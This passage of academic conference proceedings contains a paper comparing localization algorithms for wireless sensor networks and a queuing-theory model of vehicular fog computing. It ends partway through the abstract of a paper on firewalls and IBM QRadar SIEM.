BP 1014, Rabat, Morocco [email protected] 2 LIMATI, University of Sultan Moulay Slimane Faculte Polydisciplinaire, Beni-Mellal, Morocco 3 SIRC/LAGES-EHTP, Hassania School of Public Labors, Km 7 El Jadida Road, B.P 8108, Casa-Oasis, Morocco [email protected]

Abstract. Localization is an important part of the Wireless Sensor Networks (WSN), therefore without the location’s information, messages will be missed. Basically, there are many localization algorithms to localize a node in WSN, however when we handle the number of anchors, we influence the accuracy of the localization, in this paper we shall first explore various techniques of localization, and in the second step we shall compare their performance in term of accuracy, we will also demonstrate that increasing the number of anchors, influences the accuracy of each localization technique. Keywords: WSN · Localization · Centroid · APIT · DVHOP

1 Introduction Wireless Sensor Networks (WSNs) distinguish themselves from other traditional wireless or wired networks through a sensor and an actuator based interaction with the environment. Such networks have been proposed for various applications including search, rescue, disaster relief, target tracking, and smart environments. Localization is the process of determining the position of an unknown node based on the known node position by some mechanism or logic integrated in the algorithm, and it is vital to many applications, such as battlefield surveillance [1], environmental monitoring [2], target tracking [3]. Furthermore, many routing protocols such as the network which is based on the assumption of the geographic parameters of the sensor nodes available. Although many existing positioning systems and algorithms can solve the WSN positioning issues, there are still some problems: the unknown position node must be located directly, which results in the increase of the anchor node density. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 179–190, 2023. https://doi.org/10.1007/978-3-031-35251-5_16

180

O. Arroub et al.

This paper makes three major contributions to the localization problem in WSNs. First, we explore variety of range-free algorithms. Second, we compare their performance in term of accuracy under realistic system configurations. We perform such a study to serve as a guide for future research. Third, we demonstrate that APIT performs better when the number of anchors is high and random node placement are considered. The rest of the paper is organized as follows, in Sect. 2 we shall present the wireless sensor network. In Sect. 3 we shall present the details of localization algorithms. The simulation, and its results are presented in Sect. 4. Finally, Sect. 5 will conclude the paper.

2 Wireless Sensor Network (WSN) Wireless sensor networks (WSNs) are considered and used in a wide range of applications, such as military sensing, data broadcasting [4], environmental monitoring [5], Intelligent Vehicular Systems [6], multimedia [7], patient monitoring [8], agriculture [8], industrial automation [9] and audio [10] etc. The WSN networks have not yet achieved widespread deployments, even if they have been proven capable to meet the requirements of many application categories. The WSN has some limitations like low computing power, small storage devices, narrow network bandwidth and very low battery power. The sensor nodes are usually scattered in a sensor field as shown in Fig. 1. Each of these scattered sensor nodes has the capabilities to collect data and route it back to the sink and the end users. These Data are routed back to the end user by a multi hop infrastructure through the sink. The sink may communicate with the task manager node via Internet or Satellite.

Fig. 1. Sensor nodes scattered in a sensor field

3 Localization Algorithm In the WSNs, They are two main categories of localization algorithm: • The range-based technique • The range-free technique

Performance Comparison of Localization Techniques

181

3.1 Range-Based Technique It realizes self-location of an unknown node by computing the distance or direction between the unknown node and nearby anchor nodes like the received signal strength indication (RSSI) algorithm [11], the time of arrival (TOA) algorithm [12], the time difference of arrival (TDOA) algorithm [13], and so forth [14]. This class shows a very accurate location result, but it is generally very energy-consuming. Furthermore, and the additional hardware is usually required. It also increases the overall cost of WSNs. 3.2 Range-Free Technique It utilizes the connectivity of WSNs to obtain the location information of an unknown node, such as the Centroid localization algorithm [15], APIT algorithm, DV-Hop [16], and amorphous. 3.2.1 Centroid Algorithm In this method the unknown sensor node localizes itself by calculating the Centroid of position of all the adjacent connecting anchor nodes. The Centroid algorithm differs from trilateration as it is a range-free algorithm. The Range free algorithms do not depend entirely on RSSI distance measurements for localization. In this algorithm, a node will get signals from all other anchor nodes that are already in the range. The node is then localized to the center of gravity of the intersection of the circles formed by the propagation model of each anchor node. This is done by simply averaging the x and y coordinates. They use anchors containing location information (Xi, Yi), to estimate node position. After receiving these anchors, a node estimates its location using the following Centroid formula [17]: (Xest , Yest ) = (

X1 + . . . + X Y1 + . . . Y , ) N N

(1)

The advantage of centroid algorithm is in its non complexity, cost-effective and ease of implementation. The disadvantage of this algorithm is the large amount of errors that can be made. The pseudo code of Centroid:

182

O. Arroub et al.

3.2.2 APIT Localization Algorithm In this section, we describe our novel area-based range-free localization scheme, which we call APIT. APIT requires a heterogeneous network of sensing devices where a small percentage of these devices (percentages vary depending on network and node density) are equipped with high-powered transmitters and location information obtained via GPS or some other mechanism. We refer to these location-equipped devices as anchors. Using beacons from these anchors, APIT employs a novel area-based approach to perform location estimation by isolating the environment into triangular regions between beaconing nodes (Fig. 2).

Fig. 2. Area-based APIT algorithm overview

The procedures of APIT are mainly about four steps as the following: • beaconing phase: nodes collect the information about those anchor nodes which can communicate with it according to the information broadcasted by anchor nodes. • PIT (Point in Test) execution phase: After the first phase, every unknown node collects all the information of anchor nodes, so, the unknown node checks every three of them and test if the unknown node is in the triangle composed by the three anchor nodes.

Performance Comparison of Localization Techniques

183

• Grid scanning phase: If the unknown node in the triangle composed by the three anchor nodes, then the grids’ count will be increased by 1 in the triangle • Centroid calculate phase: After the above three steps, we can find the entire grid who has the max count, then calculate the centroid of the polygon that composed by the grids.

APIT Aggregation Once the individual APIT tests finish, APIT aggregates the results (inside/outside decisions among which some may be incorrect) through a grid SCAN algorithm (Fig. 3). In this algorithm, a grid array is used to represent the maximum area in which a node will likely reside. The basic idea of Grid SCAN algorithm is that dividing the entire network into several grids according to certain steps, and using the APIT algorithm to determine the relationship between the unknown nodes and the triangles. If the unknown node is inside the triangle, the value of all the grids in the triangle is added by 1; and if the unknown node is outside the triangle, the value of all the grids in the triangle is decreased by 1. After traversing all the triangles, the area with the maximum value is the area where the node is most likely to appear. As shown in Fig. 3, the black triangle is the unknown node, and the shaded area is the largest polygon area where the node is most likely to appear.

184

O. Arroub et al.

Fig. 3. Scan approach

3.2.3 DVHOP Algorithm The three steps of the DV-Hop algorithm are discussed as follows Step 1: Flooding In this step, all anchor nodes broadcast data packets with their localizations to their neighbors and hop digital segments are initially set to zero. The structure of the data packet is {id, xi, yi, hi}, including identifier id, the coordinate of the anchor node i is (xi, yi), hi the minimum hop-count value from the anchor node i, and the initial value of hi is zero. Once the neighbor node receives a packet with a smaller hop-count value from a particular anchor node, the localization of the anchor node is recorded and adds ‘1’ to the hop-count value before sending it to other neighbor nodes [18–23]. Packets with high hop-count values are defined as obsolete information to be ignored. As soon as this

Performance Comparison of Localization Techniques

185

step is completed, each one of the unknown nodes in the network retrieves the value of the minimum hop-count for each anchor node. Step 2: Distance Estimation between Nodes In this step, the distance between each node is estimated. First, it calculates the average distance per hop of each anchor node. For the anchor node, it uses Eq. (2) to calculate the average distance per hop:  i#j di, j Hopsizei =  (2) i#j hi, j  where di,j = (xi − xj)2 + (yi − yj)2 (xi, yi) and (xj, yj) represent the location of anchor nodes i and j, and hi,j represents the minimum hop-count value in anchor nodes i and j. After calculating HopSizei, each anchor node broadcasts its HopSizei in the system through controlled flooding. Equation (3) is used to determine the estimated distance between the unknown node and the anchor node i. du,i = HopSizei ∗ hu,i

(3)

where hu,i represents the minimum value of hop-count between anchor node i and unknown node u. Step 3: Estimate the Location of Nodes In step 3, it is required to find out the location of all unknown nodes. For the unknown node u, the multilateration method [24] is used to estimate its location. Let (xu, yu) be the location of the unknown node u and (xi, yi) be the location of the anchor node, where i = 1, 2, …, m. Therefore, the distance between unknown nodes u and m anchor nodes is specified by the following equation: ⎧ (x1 − xu )2 + (y1 − yu )2 = d12 ⎪ ⎪ ⎨ (x2 − xu )2 + (y2 − yu )2 = d22 ⎪ ..... ⎪ ⎩ (xm − xu )2 + (ym − yu )2 = d12

(4)

Equation (4) can be extended to: ⎧ ⎪ ⎪ ⎨

2 − 2(x − x )x + y2 − y2 − 2(y − y )y = d2 − d2 x12 − xm 1 m u 1 m u m m 1 1 2 − 2(x − x )x + y2 − y2 − 2(y − y )y = d2 − d2 x22 − xm 2 m u 2 m u m m 2 2 ⎪ ..... ⎪ ⎩ 2 2 2 2 − 2(x 2 2 xm−1 − xm m−1 − xm )xu + ym−1 − ym − 2(ym−1 − ym )yu = dm−1 − dm (5)

186

O. Arroub et al.

The above Eq. (5) can be expressed in matrix form as AX = B, where A, X and B are expressed by Eqs. (6)–(8), respectively. ⎤ 2(y1 − ym ) 2(x1 − xm ) ⎢ 2(x2 − xm ) 2(y2 − ym ) ⎥ ⎥ A=⎢ ⎦ ⎣ .... .... 2(xm−1 − xm ) 2(ym−1 − ym ) ⎡ 2 + y2 − y2 + d 2 − d 2 x12 − xm m m 1 1 2 − x 2 + y2 − y2 + d 2 − d 2 ⎢ x m m m 2 2 2 B=⎢ ⎣ ...... 2 2 2 + y2 2 2 − xm xm−1 m−1 − ym + dm − dm−1   x X= u yu ⎡

(6) ⎤ ⎥ ⎥ ⎦

(7)

(8)

It utilizes the least method to solve the equation. The coordinate location of the unknown node u is calculated: −1  AT B (9) X = AT A 3.2.4 Amorphous Localization Radhika Nagpal has proposed [25] Amorphous algorithm, unlike DV-Hop, it assumes that the average network connectivity of local is known and uses Eq. (10) to compute network average hop distance. Among them, r is the communication radius, nlocal is the average network connectivity. The average distance of each hop estimated distance multiplied with minimum hop count is calculated to be positioning of nodes, and anchor nodes also need to work out at least three distances, using maximum likelihood estimation to estimate its position or three sided measurements.     1 −nlocal  √ arcost−t 1−t 2 −nlocal π − e dt (10) HopSize = r 1 + e −1

In essence, the Amorphous algorithm is an enhanced version of DV-Hop algorithm, the gradient correction method and the distance of each hop algorithm calculation, and the introduction of a number of anchor nodes estimate refinement. The algorithm needs to predict the average connectivity of network and need higher node densities.

4 Simulation and Results This section describes the simulation settings we use in our evaluation.

Performance Comparison of Localization Techniques

187

4.1 Placement Model In our simulations, nodes and anchors are distributed in a rectangular terrain in accordance with predefined densities. Two placement strategies are considered, namely random and uniform. 1) Random placement: it distributes all nodes and anchors randomly throughout the terrain. 2) Uniform placement: the terrain is partitioned into grids and nodes and anchors are evenly divided amongst these grids (random distribution inside each grid). 4.2 System Parameters In our experiments we study a network with. • number of nodes: 300 nodes • mobility of nodes: static Placement: Random and Uniform node/anchor placements are investigated in the evaluation. 4.3 Results This section provides a detailed quantitative analysis comparing the performance of localization algorithms. The obvious metric for comparison when evaluating localization schemes is location estimation error. We have 2 experiments in the uniform and random placement with handling the number of anchor. In this experiment, we analyze the effect of varying the number of anchors heard (AH) at a node to determine its effect on localization error. Figure 4 shows that the estimation error decreases as the number of anchors heard increases. However, it is important to note that different algorithms transition at different points in the graph. For example, the Amorphous and DV-Hop schemes improve rapidly when AH is below 7, insensitive to the addition of anchors above 7 In contrast, the precision of APIT and the Centroid localization scheme constantly improve as AH is increased (Fig. 5). Our APIT algorithm performs worse than the Centroid algorithm when AH is below 8 due to the fact that the diameter of the divided area is not small enough. This effect is significantly reduced by increasing AH values. For larger AH values, APIT consistently outperforms the Centroid scheme. Figure 5 extends AH to higher values in order to show estimation error 12 anchors to reach the 0.6R level while the Centroid scheme requires 24. Finally, we note that APIT scheme performs best when random node placement are considered.

188

O. Arroub et al.

Fig. 4. Localization error when varying number of anchor in random deployment

Fig. 5. Localization error when varying number of anchor in uniform deployment

Performance Comparison of Localization Techniques

189

5 Conclusion and Future Works In this paper, Centroid algorithm is proposed where the unknown sensor node localizes itself by calculating the centroid of position of all the adjacent connecting anchor nodes, this algorithm is easy to implement but it made a large amount of errors, a DV-Hop algorithm is based on the minimum hop number from the anchor nodes to the unknown node. It estimates its self position through triangulation algorithm or maximum likelihood estimators. This algorithm can get better location accuracy only in the uniformly distributed and dense sensor network environment, an Amorphous algorithm is proposed, this algorithm is improved by the DV-Hop algorithm, but the formula of the network average hop distance is different from the DV-Hop algorithm. The Amorphous algorithm is easy to implement, but it requires high node densities. Finally we find that APIT has the best performance, especially in the random node placement. Thus, APIT has good performance, but the GRID SCAN method makes plenty of redundancy errors, especially, when applied in underwater fields, and with the effect of noise and interferences, this has an enormous impact on the accuracy of the localization. In order to consolidate the theoretical results cited previously, we suggest to lead the experiment of the APIT method in a pool experiment. Which aims at solving the redundancy that occurs in the traditional APIT algorithm.

References 1. Wang, Z., Wang, X., Liu, L., Huang, M., Zhang, Y.: Decentralized feedback control for wireless sensor and actuator networks with multiple controllers. Int. J. Mach. Learn. Cybern. 8(5), 1471–1483 (2016). https://doi.org/10.1007/s13042-016-0518-y 2. Bhatti, G.: Machine learning based localization in large-scale wireless sensor networks. Sensors 18, 4179 (2018) 3. Wang, J., Ghosh, R.K., Das, S.K.: A survey on sensor localization. J. Control Theory Appl. 8, 2–11 (2010) 4. Liang, W., Tang, M., Long, J., Peng, X., Xu, J., Li, K.-C.: A secure fabric blockchain-based data transmission technique for industrial internet-of-things. IEEE Trans. Ind. Inform. 15, 3582–3592 (2019) 5. Romer, K., Mattern, F.: The design space of wireless sensor networks. IEEE Wirel. Commun. 11, 54–61 (2004) 6. Liang, W., Li, K.-C., Long, J., Kui, X., Zomaya, A.Y.: An industrial network intrusion detection algorithm based on multi-feature data clustering optimization model. IEEE Trans. Ind. Inform. 16, 2063–2071 (2019) 7. Cui, M., Han, D., Wan, J.: An efficient and safe road condition monitoring authentication scheme based on fog computing. IEEE Internet Things J. 6, 9076–9084 (2019) 8. Liang, W., Long, J., Weng, T.-H., Chen, X., Li, K.-C., Zomaya, A.Y.: TBRS: a trust based recommendation scheme for vehicular CPS network. Future Gener. Comput. Syst. 92, 383– 398 (2019) 9. Zhao, W., Su, S., Shao, F.: Improved DV-hop algorithm using locally weighted linear regression in anisotropic wireless sensor networks. Wirel. Pers. Commun. 98, 3335–3353 (2018) 10. Peng, B., Li, L.: An improved localization algorithm based on genetic algorithm in wireless sensor networks. Cogn. Neurodyn. 9(2), 249–256 (2015). https://doi.org/10.1007/s11571014-9324-y

190

O. Arroub et al.

11. Harikrishnan, R., Kumar, V.J.S., Ponmalar, P.S.: Differential evolution approach for localization in wireless sensor networks. In: Proceedings of the IEEE International Conference on Computational Intelligence and Computing Research, Coimbatore, India, 18–20 December 2014, pp. 1–4 (2014) 12. Storn, R., Price, K.: Differential evolution–a simple and efficient heuristic for global optimization over continuous spaces. J. Glob. Optim. 11, 341–359 (1997) 13. Sarker, R.A., Elsayed, S.M., Ray, T.: Differential evolution with dynamic parameters selection for optimization problems. IEEE Trans. Evol. Comput. 18, 689–707 (2013) 14. Xie, P., You, K., Song, S., Wu, C.: Distributed range-free localization via hierarchical nonconvex constrained optimization. Signal Process. 164, 136–145 (2019) 15. Bachrach, J., Nagpal, R., Salib, M., Shrobe, H.: Experimental results for and theoretical analysis of a self-organizing global coordinate system for ad hoc sensor networks. Telecommun. Syst. 26, 213–233 (2004) 16. He, T., Huang, C., Blum, B.M., Stankovic, J.A., Abdelzaher, T.: Range-free localization schemes for large scale sensor networks. In: Proceedings of the 9th Annual International Conference on Mobile Computing and Networking, San Diego, CA, USA, 14–19 September 2003, pp. 81–95 (2003) 17. Zhang, S., Liu, X., Wang, J., Cao, J., Min, G.: Accurate range-free localization for anisotropic wireless sensor networks. ACM Trans. Sens. Netw. 11, 51 (2015) 18. Manickam, M., Selvaraj, S.: Range-based localisation of a wireless sensor network using Jaya algorithm. IET Sci. Meas. Technol. (2019) 19. Wei, H., Wan, Q., Chen, Z., Ye, S.: A novel weighted multidimensional scaling analysis for time-of-arrival-based mobile location. IEEE Trans. Signal Process. 56, 3018–3022 (2008) 20. Xiao, J., Ren, L., Tan, J.: Research of TDOA based self-localization approach in wireless sensor network. In: Proceedings of the IEEE/RSJ International Conference on Intelligent Robots and Systems, Beijing, China, 9–15 October 2006, pp. 2035–2040 (2006) 21. Niculescu, D., Nath, B.: Ad hoc positioning system (APS) using AOA. In: Proceedings of the IEEE INFOCOM 2003. Twenty-second Annual Joint Conference of the IEEE Computer and Communications Societies (IEEE Cat. No. 03CH37428), San Francisco, CA, USA, 30 March–3 April 2003, pp. 1734–1743 (2003) 22. Xie, H., Li, W., Li, S., Xu, B.: An improved DV-hop localization algorithm based on RSSI auxiliary ranging. In: Proceedings of the 35th Chinese Control Conference (CCC), Chengdu, China, 27–29 July 2016, pp. 8319–8324 (2016) 23. Kulkarni, V.R., Desai, V., Kulkarni, R.V.: A comparative investigation of deterministic and metaheuristic algorithms for node localization in wireless sensor networks. Wirel. Netw. 25(5), 2789–2803 (2019). https://doi.org/10.1007/s11276-019-01994-9 24. Capkun, S., Hamdi, M., Hubaux, J.: GPS-free positioning in mobile ad hoc networks. Clust. Comput. 5, 157–167 (2002) 25. Niculescu, D., Nath, B.: DV based positioning in ad hoc networks. Telecommun. Syst. 22, 267–280 (2003)

Fog Computing Model Based on Queuing Theory Hibat Eallah Mohtadi(B) , Mohamed Hanini, and Abdelkrim Haqiq Faculty of Sciences and Techniques, Computer, Networks, Mobility and Modeling Laboratory: IR2M, Hassan First University of Settat, 26000 Settat, Morocco {h.mohtadi,abdelkrim.haqiq}@uhp.ac.ma

Abstract. To overcome the limitations of Cloud server that does not fit well for vehicles needing high-speed processing, low latency, and more security; Fog computing was evolved, extending the functionality of cloud computing model to the edge of the network. Therefore, the idea of utilizing vehicles as the infrastructures, named Vehicular Fog Computing (VFC) is proposed. The VFC is an architecture that utilizes a collaborative multitude of end-user clients or near-user edge devices to carry out communication and computation, based on better utilization of individual communication and computational resources of each vehicle. In this work, we will try to determine the Qos performances in different scenarios. We will as well, try to give a mathematical model by formulating the vehicular fog computing system using the queuing theory, in order to find out and evaluate the QoS parameters such as the mean throughput, the mean number of requests, the service utilisation..., than we will implement our analytical results to try to find out the effect of the mobility on the fog computing; We consider that the service time in our mathematical model is the key factor of the mobility which means that each vehicle had a service time so when the vehicles move the service time changes.

Keywords: Internet of Things computing · queuing theory

1

· Fog computing · Vehicular fog

Introduction

The vehicles could be used as an infrastructure for the computing and form what we call Vehicular Cloud Computing (VCC) [1]. Recently the IoT (Internet of Things) applications had recognized a considerable growth that causes serious challenges to the classic cloud computing, for instance, the increasing of demand of real-time or high latency due to the immense number of data generated by the IoT devices [4]. Consequently, the fog computing has been introduced by CISCO to enable applications on billions of connected devices, already connected in the internet of things, to run directly at the network edge, moreover fog computing will bring cloud networking computing and storage capacities down to the edge c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023  J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 191–198, 2023. https://doi.org/10.1007/978-3-031-35251-5_17

192

H. E. Mohtadi et al.

of the network [10]. The fog computing had improved the confidentiality and the response rate also had shown a decrease on the usage of the internet connection on many applications on smart environment [3]. In order to benefits from the underutilized resources of vehicles, the Vehicular Fog Computing (VFC) have been introduced by [2] to make use of the computation, communication and storage capacities of vehicles in the fog environment. The network of the VFC is composed of fog nodes and vehicles for the local decision making [6]. In fact, the VFC has a lot of advantages such as Low latency, high mobility support, it also ensures a large number of fog nodes distributed at the proximity of users [7]. In other words, Fog computing in vehicle context is beneficial in terms of Band Width (BW) and also it is a best approach for low latency applications [11]. VFC has lately received a lot of interest because to the near vicinity of computational resources to the network edge or the end devices. Especially, by using vehicles as fog nodes that increase the fog resources and give the chance to make local processing and storage in vehicles [5]. In this paper, We adopt an architecture for VFC to optimally schedule the tasks offloading and resource allocation. In order to study the effect of the mobility on the service QoS in this architecture, we propose a model based on queening theory, we measure different performance metrics in fog layer. The motivation behind using queening theory is that the queening models improve high data transmission stability and service utilisation reliability [8]. Our main aim is to study the impact of the mobility on the QoS parameters of our system, besides the mean service rate of the mobile fog which is the moving vehicle that supposed to be unsteady due to the mobility, in other word, one of the most parameters that will be affected by the mobility is the mean service rate, that will depend to each vehicle playing the role of a fog node, therefore we will have varied mean service rates relying on the quality of the vehicle. The remainder of this paper is organized as follows: Sect. 2 describes the architecture of Vehicular Fog Computing. Section 3 exposes the model description in details. Section 4 introduces the problem analytical model and gives the performance parameters. Section 5 evaluates and discusses the numerical results. Finally, Sect. 6 concludes the paper and outlines some future directions to explore.

2

Vehicular Fog Computing Architecture

The aim of the fog computing is to reduce latency by providing a virtual platform at near to the user edge devices that can ensure the computing storage and processing. In the context of VFC we consider three tiers [9]. The first one is IoT devices layer composed of different IoT devices such as smart vehicles, smart phones, sensors, that exist everywhere. They are responsible for generating and transmitting traffic data, workload, applications and communicate it either to the cloud or the fog to be processed. The second tier that exists between the IoT devices and the cloud is the fog, it includes any devices that could achieve storage, computing and network connectivity; furthermore it is defined by two kinds of nodes mobile such as

Fog Computing Model Based on Queuing Theory

193

moving vehicles, and stationary or static fogs as RSU, WIFI access. This layer is in charge to effect the prepossessing of the collected data and temporary store the received data. The FC(Fog Computing) is able to done the real-time analysis and latency-sensitive applications. The third tier is the cloud computing layer that has huge computing and storage capacity guaranteed by the DC(Data Centers) which support the analysis, processing and storing of the great amount data. Figure 1 shows the three tiers architecture we had described.

Fig. 1. The system architecture of vehicular fog computing.

3

Model Description

The system model is presented by two parallel queues each waiting line having a single server. First queue represents a stationary fog formed by EC (Edge Computing) nodes and the second queue is a mobile fog that defines the vehicles [12]. Both of them assumed to be operating independently. The service time distributions for queues are independent exponentially distributed with parameters μ1 and μ2 for the static and mobile queue respectively. The arrivals process are Poisson processes of rates λ1 and λ2 . We assumed that the service discipline is the usual one first come, first served. The static and mobile fog queues have a maximum capacity of M and N messages requests. Reached at first the fog dispatcher that take control to affect the proper task to one of the fog nodes with a probability of p to the static one or (1−p) to the mobile one, so that the incoming message should be processed by EC(static)or Vehicle(mobile) node. Our system model is represented in Fig. 2. After this step on other task controller between the fog and the cloud nodes takes the decision either that the task had completed the service and should departs from the system with a probability q or should be sent to the CDC (Cloud Data Centres) for more processing in order to complete the service with a probability of (1 − q).

194

H. E. Mohtadi et al.

Fig. 2. Queuing system model of vehicular fog computing.

4

Problem Analytical Model

Let Pij be the equilibrium probability that there are i, j message requests in the static and mobile fog respectively. 4.1

The Mobile and Static Fog Nodes Models

The marginal distributions We consider the marginal probabilities: P.j =

M 

Pij

(1)

Pij

(2)

i=0

Pi. =

N  j=0

Which gives us the following solution after the resolution of balance equations. Pi. = ρi1 P0. , With P0. = P.j = ρj2 P.0 , With P.0 = Where ρ2 =

4.2

λ2 μ2

1−ρ1 +1 1−ρM 1 1−ρ2 +1 1−ρN 2

< 1, ρ1 =

λ1 μ1

< 1 for the stability

QoS Performance Parameters

The static fog node model The mean throughput service is s XEC = μ1 (1 − P0. ) = μ1

+1 ρ1 − ρM 1 M +1 1 − ρ1

(3)

The mean number of message requests EEC =

M +1 ρ1 1 − (M + 1)ρM 1 + M ρ1 M +1 1 − ρ1 1 − ρ1

(4)

Fog Computing Model Based on Queuing Theory

195

The EC server utilization is UEC = ρ1

1 − ρM 1 +1 1 − ρM 1

(5)

The mobile fog node model The mean throughput service expressed as XVs = μ2

+1 ρ2 − ρN 2 +1 1 − ρN 2

(6)

The mean number of message requests can be obtained by using the equation EV =

N +1 ρ2 1 − (N + 1)ρN 2 + N ρ2 +1 1 − ρ2 1 − ρN 2

(7)

The server utilization is UV = ρ2

1 − ρN 2 +1 1 − ρN 2

(8)

Qos performance parameters of the Fog Computing tier The total mean throughput service ρ2 − ρN ρ1 − ρM 2 1 + μ1 N +1 +1 1 − ρ2 1 − ρM 1

(9)

1 − ρM 1 − ρN 1 2 + ρ2 M +1 +1 1 − ρ1 1 − ρN 2

(10)

s XFs C = XEC + XVs = μ2

The total service utilisation UF C = UV + UEC = ρ1

Finally, the total mean number of message requests EF C = EEC + EV

5

(11)

Numerical Results

In this section we aim to briefly analyse theoretical results of our model and show the effect of the mobility on our vehicular fog computing model. We fix the values of λ, μ1 , N, M, p. The simulation parameters are listed in Table 1. We plot some of the Qos parameters which are the total mean throughput service, the total service utilisation and the total mean number of requests for the fog tier for different values of mean service time of the mobile fog node μ2 . In order to show the effect of the mobility and the variation of the structure of the mobile fog nodes on the system performance.

196

H. E. Mohtadi et al. Table 1. Simulation parameters. Parameter

Value

λ Message request arrival rate

[1000 to 10,000] (req/s)

μ1 Mean message request EC service time

0.01 (s)

N Maximum number of message requests in the mobile fog node

50

M Maximum number of message requests in the static fog node

60

p The probability that the message is forwarded to the static fog node

0.2

500

500

450

mu21=0.01 mu22=0.02 mu23=0.06

450 400

350

the service utilisation

the service utilisation

400

300 250 200 150

300 250 200 150

100

100

50 0 1000

350

2000

3000

4000

5000

6000

incoming rate

7000

8000

9000

10000

50 0.1

0.15

0.2

0.25

0.3

0.35

0.4

0.45

0.5

0.55

0.6

service rate

(a) The service utilisation of the fog(b) The service utilisation of the fog tier for different values of mean ser-tier vice time of mobile fog node µ2

Fig. 3. The service utilisation of the fog tier

6

Discussion

Figure 3a introduces the plot of the service utilisation of the fog tier that shows that when the arrival rate augments the service utilisation augments, and when μ2(the mean service time of the mobile fog), changes and gets bigger the service utilisation increases and (Fig. 3b) confirms this fact. Figure 4a shows that when λ changes the mean number of request is changing, for instance for λ = 1000, when λ increases the number of request decreases. But for λ > 9000 the mean request message is kind of getting flat. When μ2 gets bigger the mean number of requests of the fog tier decrease as shown in (Fig. 4a), (Fig. 4b). Figure 5a shows the result after using various values of μ2 to plot the mean throughput service of the fog tier. When λ augmented the mean throughput service increases. When μ2 gets smaller the mean throughput service gets smaller too what means that there are less throughput achieved as shown (Fig. 5b).

Fog Computing Model Based on Queuing Theory

15

10.4 mu21=0.02 mu22=0.04 mu23=0.06

14.5 14

10.2

the mean number of requests

the mean number of requests

197

13.5 13 12.5 12 11.5 11

10

9.8

9.6

9.4

10.5 10 1000

2000

3000

4000

5000

6000

7000

8000

9000

9.2 0.1

10000

0.15

0.2

0.25

0.3

incoming rate

0.35

0.4

0.45

0.5

0.55

0.6

service rate

(a) The mean number of requests of the fog(b) The mean number of requests of the fog tier for different mean service time of mobiletier fog node µ2

Fig. 4. The mean number of requests of the fog tier 30

200 mu21=0.02 mu22=0.04 mu23=0.06

180

the mean throughput service

the mean throughput service

25

20

15

10

160 140 120 100 80 60 40

5

20 0 1000

2000

3000

4000

5000

6000

incoming rate

7000

8000

9000

10000

0 0.1

0.15

0.2

0.25

0.3

0.35

0.4

0.45

0.5

service rate

(a) The mean throughput service of the fog(b) The mean throughput service of the fog tier for different mean service time of mobiletier fog node µ2

Fig. 5. The mean throughput service of the fog tier

7

Conclusion

This work, presented a model architecture of the FC, using vehicles as a part of the infrastructure of the fog tier. Moreover, we introduced a queening theory model in order to study the Qos parameters and the effect of the mobility of vehicles on the system performance. Our numerical results reinforce our vision that the mobility will definitely affect the performance of our model. As a perspective of this work we plan to study the effect of the mobility on the message request and how to mange the loss of the signal if the vehicle leaves the system before achieving the required task.

198

H. E. Mohtadi et al.

References 1. Gaouar, N., Lehsaini, M.: Toward vehicular cloud/fog communication: a survey on data dissemination in vehicular ad hoc networks using vehicular cloud/fog computing. Int. J. Commun. Syst. 34(13), e4906 (2021) 2. Hou, X., Li, Y., Chen, M., Wu, D., Jin, D., Chen, S.: Vehicular fog computing: a viewpoint of vehicles as the infrastructures. IEEE Trans. Veh. Technol. 65(6), 3860–3873 (2016) 3. Kanyilmaz, A., Cetin, A.: Fog based architecture design for iot with private nodes: a smart home application. In: 2019 7th International Istanbul Smart Grids and Cities Congress and Fair (ICSG), pp. 194–198. IEEE (2019) 4. Laroui, M., Nour, B., Moungla, H., Cherif, M.A., Afifi, H., Guizani, M.: Edge and fog computing for iot: a survey on current research activities & future directions. Comput. Commun. 180, 210–231 (2021) 5. Lee, S.s., Lee, S.: Resource allocation for vehicular fog computing using reinforcement learning combined with heuristic information. IEEE Internet Things J. 7(10), 10450–10464 (2020) 6. Liang, J., Zhang, J., Leung, V.C., Wu, X.: Distributed information exchange with low latency for decision making in vehicular fog computing. IEEE Internet Things J., 1 (2021) 7. Menon, V.G., Prathap, J.: Vehicular fog computing: challenges applications and future directions. Int. J. Veh. Telemat. Infotainment Syst. (IJVTIS) 1(2), 15–23 (2017) 8. Ravi, B., Thangaraj, J.: Stochastic traffic flow modeling for multi-hop cooperative data dissemination in vanets. Phys. Commun. 46, 101290 (2021) 9. Sarkar, S., Misra, S.: Theoretical modelling of fog computing: a green computing paradigm to support iot applications. Iet Networks 5(2), 23–29 (2016) 10. Xiao, Y., Zhu, C.: Vehicular fog computing: vision and challenges. In: 2017 IEEE International Conference on Pervasive Computing and Communications Workshops (PerCom Workshops), pp. 6–9. IEEE (2017) 11. Yousefpour, A., Fung, C., Nguyen, T., Kadiyala, K., Jalali, F., Niakanlahiji, A., Kong, J., Jue, J.P.: All one needs to know about fog computing and related edge computing paradigms: a complete survey. J. Syst. Architect. 98, 289–330 (2019) 12. Zhu, C., Pastor, G., Xiao, Y., Li, Y., Ylae-Jaeaeski, A.: Fog following me: Latency and quality balanced task allocation in vehicular fog computing. In: 2018 15th Annual IEEE International Conference on Sensing, Communication, and Networking (SECON), pp. 1–9. IEEE (2018)

From Firewall and Proxy to IBM QRadar SIEM Yasmine El Barhami1(B) , Hatim Kharraz Aroussi2 , and Chaimae Bensaid3 1 Cybersecurity Engineer, Math-Computer Science Laboratory, Ibnu Tofail University, Kenitra,

Morocco [email protected] 2 Réseaux et Capteurs Math-Computer Science Laboratory, Ibnu Tofail University, Kenitra, Morocco 3 Ingénieur DBA, Math-Computer Science Laboratory, IbnuTofail University, Kenitra, Morocco

Abstract. Nowadays, we often hear about information systems, systems that make up all companies in different sectors. A new concept that has emerged since the beginning of 1980 and has changed the organization of companies by pushing them towards competition. An information system can be available in any type of company: SME or large company that is composed of: • Applications: generally the ERP is the heart of the IS, as well as the CRM if there are interactions with the customer, the HRIS (Human Resources Information System), marketing, specific developments, services, APIs (Application Programming Interface), etc. • Users: more specifically tools and services from the workstation to mobility (office automation) • Administration: the management of the IS and its components • Infrastructure: everything that includes storage servers, databases, networks, virtualization, cloud, Big Data, IoT, security equipments such as firewalls, proxy, IDS and anti-virus: this is what interests us most in our topic An information system resides in any type of company, including critical infrastructures: These are the decisive constructions for our society. Critical infrastructure can simply be defined as the set of critical systems. They are composed of nine sectors, subdivided into 27 subsectors (branches). In principle, all elements (operating companies, IT systems, installations, constructions, etc.) that provide services in one of the 27 sub-sectors – 